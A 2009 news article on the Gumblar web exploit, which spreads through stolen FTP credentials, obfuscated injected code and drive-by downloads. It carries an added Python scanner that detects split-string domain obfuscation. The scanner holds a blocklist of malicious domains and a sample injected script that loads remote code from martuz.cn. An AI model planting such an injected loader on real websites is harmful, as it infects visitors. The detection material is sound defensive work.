Attackers change the malicious domain and enhance obfuscation

May 20, 2009 12:13 GMT

Security researchers warn that the currently most widespread web threat, technically known as JSRedir-R, but generally called Gumblar, has morphed in order to resist take-down attempts. The new iteration of this exploit features a new domain name and more complex obfuscation.

Gumblar is a complex web exploit. Reportedly, it compromises websites through FTP credentials stolen from infected machines used to administer them. Once in, it appends obfuscated code to many types of files: HTML, JavaScript, PHP and even images. It also installs backdoors, for example in .htaccess, making cleaning more difficult.

The obfuscated code proceeds to infect visitors through a method called drive-by download. More specifically, it attempts to exploit known vulnerabilities in Adobe Reader or Flash Player through malicious files served from a domain called gumblar.cn, hence its name. Recently, Sophos has reported that JSRedir-R accounts for over 40% of the infections detected on the web.

Security researchers from ScanSafe warn that a new version of this exploit has been seen in the wild. "The Gumblar attacks have morphed again, this time pulling the malcode from martuz.cn. In addition, the reference URI remains slightly obfuscated – perhaps an attempt to thwart rudimentary blacklists. For example, the URI resulting from the injected script might appear as mar"+"tuz.cn instead of just martuz.cn," they explain.

Symantec analysts confirm the new attacks and add that, "The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains." There is yet no indication that the new version will spread as fast as the previous one, but, regardless of that, the researchers "expect the domains and malicious JavaScript appearing on the websites to continually change as one mole is whacked, and another pops up."
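As an added illustration, not code from the article or from either vendor, the following Python scanner folds the kind of split string literal the ScanSafe researchers describe ("mar"+"tuz.cn") before matching hosts against a blocklist, and shows why a plain substring match misses it. The sample script, the regexes and the function names are constructed for this example.

```python
import re

# Domains named in the article; a real scanner would load these from a feed.
BLOCKLIST = {"gumblar.cn", "martuz.cn"}

# A single JavaScript string literal (no escape handling needed for this demo).
_LITERAL = re.compile(r'"([^"\\]*)"|\'([^\'\\]*)\'')
# A scheme-relative or absolute URL host, e.g. //martuz.cn or http://gumblar.cn
_HOST = re.compile(r'(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})', re.I)


def fold_concats(js: str) -> str:
    """Rewrite every chain of literals joined by '+' ("mar"+"tuz.cn") as one literal."""
    out, pos, pending = [], 0, None
    for m in _LITERAL.finditer(js):
        gap = js[pos:m.start()]                      # text between two literals
        lit = m.group(1) if m.group(1) is not None else m.group(2)
        if pending is not None and gap.strip() == "+":
            pending += lit                           # extend the current chain
        else:
            if pending is not None:
                out.append('"' + pending + '"')      # flush the finished chain
            out.append(gap)
            pending = lit
        pos = m.end()
    if pending is not None:
        out.append('"' + pending + '"')
    out.append(js[pos:])
    return "".join(out)


def naive_hits(js: str) -> list[str]:
    """Rudimentary blocklist check: substring match on the raw script."""
    return sorted(d for d in BLOCKLIST if d in js)


def find_blocklisted(js: str) -> list[str]:
    """Fold concatenations, extract hosts, match host or any parent domain."""
    hits = []
    for m in _HOST.finditer(fold_concats(js)):
        host = m.group(1).lower()
        parts = host.split(".")
        if any(".".join(parts[i:]) in BLOCKLIST for i in range(len(parts) - 1)):
            hits.append(host)
    return hits


# Constructed sample modelled on the article's description; not real injected code.
SAMPLE = ('var h="http://mar"+"tuz.cn";\n'
          'var s=document.createElement("script");\n'
          's.src=h+"/page.php";document.body.appendChild(s);')
```

Running `naive_hits(SAMPLE)` returns nothing, while `find_blocklisted(SAMPLE)` reports `martuz.cn`.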

Webmasters can use the free online Unmask Parasites Beta scanner, which checks web pages for hidden illicit content inserted by hackers. Websites compromised with Gumblar will only show up as "suspicious" after the scan, but that should be enough to serve as a starting point for further investigation.

ScanSafe's Mary Landesman cautions that, "The attackers are gaining initial access via FTP credentials that were stolen as a result of that infection. So don't just clean up your website; you'll want to clean up any of the computers used to manage that website as well."